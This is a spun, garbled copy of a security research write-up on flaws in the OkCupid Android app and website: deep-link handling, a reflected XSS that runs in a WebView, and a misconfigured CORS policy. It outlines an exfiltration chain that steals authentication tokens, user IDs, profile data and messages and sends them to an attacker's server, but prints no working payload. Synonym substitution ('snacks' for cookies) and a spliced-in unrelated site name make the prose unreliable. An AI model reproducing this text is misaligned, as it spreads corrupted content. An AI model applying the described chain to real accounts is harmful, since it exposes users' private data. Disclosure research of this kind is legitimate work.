No Daters that is actual Harmed This Workout
Analysis by Alon Boxiner, Eran Vaknin
With more than 50 million users that are registered its launch, plus the bulk aged between 25 and 34, OkCupid the most popular dating platforms globally. Conceived in 2004 whenever four buddies from Harvard developed the initial free online dating service, it claims that more than 91 million connections are built it became the first major victoria milan profiles dating site to create a mobile app through it annually, 50K dates made every week and in 2012.
Dating apps enable a comfy, available and connection that is immediate others utilizing the application. By sharing individual choices in every area, and using the app’s advanced algorithm, it gathers users to like-minded individuals who can instantly begin interacting via instant texting.
To generate each one of these connections, OkCupid develops personal pages for many its users, so that it could make the match that is best, or matches, predicated on each user’s valuable private information.
Of course, these step-by-step personal pages are not merely of great interest to prospective love matches. They’re also very prized by code hackers, as they’re the ’gold standard’ of data either to be used in targeted attacks, or even for attempting to sell on with other hacking groups, because they enable attack attempts to be very convincing to naive goals.
As our scientists have uncovered vulnerabilities various other popular social media marketing platforms and apps, we made a decision to check out the OkCupid app and see when we could find something that matched our passions. Therefore we discovered things that are several led us as a much deeper relationship (solely professional, needless to say). OkCupidThe weaknesses we discovered and now have described in this extensive research may have permitted attackers to:
- Expose users’ sensitive data saved regarding the application.
- Perform actions with respect to the target.
- Steals users’ profile and personal data, choices and traits.
- Steals users’ authentication token, users’ IDs, along with other painful and sensitive information such as e-mail details.
- Send the info collected in to the attacker’s server.
Always check Point Research informed OkCupid developers in regards to the weaknesses exposed in this research and a remedy was responsibly implemented to make certain its users can properly keep using the app that is okCupid.
OkCupid added: “Not a solitary individual ended up being relying on the possibility vulnerability on OkCupid, and now we had the ability to correct it within 48 hours. We’re grateful to lovers like Checkpoint whom with OkCupid, place the security and privacy of y our users first. ”
Mobile Platform
We started some reverse engineering to our research the OkCupid Android os mobile phone application (v40.3.1 on Android os 6.0.1). Through the reversing process, we found that the application form is opening a WebView (and allows JavaScript to perform when you look at the context for the window that is webView and loads remote URLs such as for example https: //OkCupid.com, https: //www. OkCupid.com, Https. Onelink.me that is: //OkCupid and much more.
Deep links help attackers’ intents
While reverse engineering the OkCupid application, we found so it has “deep links” functionality, to be able to invoke intents when you look at the application with a browser link.
The intents that the program listens to would be the “https: //OkCupid.com” schema, “OkCupid: //” custom schema and lots of more schemas:
An attacker can deliver a custom website link which has the schemas mentioned above. Because the customized website link will support the “section” parameter, the mobile application will start a webview (web browser) window – OkCupid mobile application. Any demand shall be sent using the users’ snacks.
For demonstration purposes, we utilized the link that is following
The mobile application starts a webview ( web browser) window with JavaScript enabled.
Reflected Cross-Site Scripting (XSS)
As our research continued, we have discovered that OkCupid primary domain, https: //www. OkCupid.com, is in danger of an XSS attack.
The injection point regarding the XSS assault had been based in the user settings functionality.
Retrieving the consumer profile settings is created using an HTTP GET request provided for the following path:
The part parameter is injectable and a hacker could apply it so that you can inject harmful code that is javaScript.
For the intended purpose of demonstration, we now have popped a clear alert screen. Note: even as we noted above, the mobile application is starting a WebView screen therefore the XSS is performed into the context of an authenticated individual utilizing the OkCupid mobile application.
Fragile Data visibility & Performing actions with respect to the target
Up to this aspect, we’re able to launch the OkCupid application that is mobile a deep link, OkCupid: //, containing a harmful JavaScript rule into the area parameter. The screenshot that is following the last XSS payload which loads jQuery and then lots JavaScript rule through the attacker’s host: (please be aware top of the section offers the XSS payload and also the base section is the identical payload encoded with URL encoding):
The screenshot that is following an HTTP GET demand containing the ultimate XSS payload (part parameter):
The host replicates the payload sent previous when you look at the part parameter therefore the injected code that is javaScript performed into the context for the WebView.
A script file from the attacker’s server as mentioned before, the final XSS payload loads. The loaded code that is javaScript be properly used for exfiltration and account contains 3 functions:
- Steal_token – Steals users’ authentication token, oauthAccessToken, while the users’ id, userid. Users’ sensitive information (PII), such as for instance current email address, is exfiltrated too.
- Steal_data – Steals users’ profile and personal information, choices, users’ characteristics ( ag e.g. Answers filled during registration), and much more.
- Send_data_to_attacker – send the data gathered in functions 1 and 2 to your attacker’s host.
Steal_token function:
The big event creates a call that is api the host. Users cookies that are provided for the host because the XSS payload is performed within the context of this application’s WebView.
The host reacts having A json that is vast the users’ id additionally the authentication token too:
Steal information function:
An HTTP is created by the function request to https: //www. OkCupid.com: 443/graphql endpoint.
In line with the data exfiltrated when you look at the function that is steal_token the demand has been sent aided by the verification token while the user’s id.
The server responds while using the information about the victim’s profile, including email, sexual orientation, height, household status, etc.
Forward information to attacker function:
The big event creates a POST request to your attacker’s host containing all the details retrieved in the function that is previous (steal_token and steal_data functions).
The screenshot that is following an HTTP POST demand provided for the attacker’s server. The request human body contains all the victim’s painful and sensitive information:
Performing actions with respect to the target can also be feasible as a result of exfiltration of this victim’s verification token additionally the users’ id. These records is employed when you look at the harmful JavaScript code (in the same way used in the steal_data function).
An attacker can execute actions such as send messages and alter profile data as a result of information exfiltrated when you look at the steal_token function:
- Authentication token, oauthAccessToken, is employed into the authorization header (bearer value).
- User id, userId, is added as needed.
Note: An attacker cannot perform complete account takeover considering that the snacks are protected with HTTPOnly.
The data exfiltrated in the steal_token function:
- Authentication token, oauthAccessToken, can be used when you look at the authorization header (bearer value).
- Consumer id, userId, is added as needed.
Note: An attacker cannot perform full account takeover because the snacks are protected with HTTPOnly.
Internet Platform Vulnerabilities Mis-configured Cross-Origin Resource Sharing Policy Contributes To Fragile Information Publicity
In the course of the investigation, we now have unearthed that the CORS policy associated with API host api. OkCupid.com is certainly not configured correctly and any beginning can deliver needs to your host and read its responses that are. The request that is following a request delivered the API server through the beginning https: //OkCupidmeethehacker.com:
The host will not validate the origin properly and reacts using the required information. Moreover, the host reaction contains Access-Control-Allow-Origin: https: //OkCupidmeethehacker.com and Access-Control-Allow-Credentials: real headers:
Only at that point on, we knew that people can send demands to your API host from our domain (OkCupidmeethehacker.com) without getting obstructed by the CORS policy.
The moment a target is authenticated on OkCupid application and browsing towards the attacker’s internet application (https: //OkCupidmeethehacker.com), an HTTP GET request is provided for https: //api. OkCupid.com/1/native/bootstrap containing the victim’s cookies. The server’s reaction includes a vast json, containing the victim’s authentication token (oauth_accesstoken) and also the victim’s user_id.
We’re able to find more data that are useful the bootstrap API endpoint – sensitive and painful API endpoints within the API host:
The screenshot that is following delicate PII data exfiltration from the /profile/ API endpoint, utilizing the victim’s user_id as well as the access_token:
The after screenshot shows exfiltration regarding the victim’s communications through the /1/messages/ API endpoint, with the victim’s user_id therefore the access_token: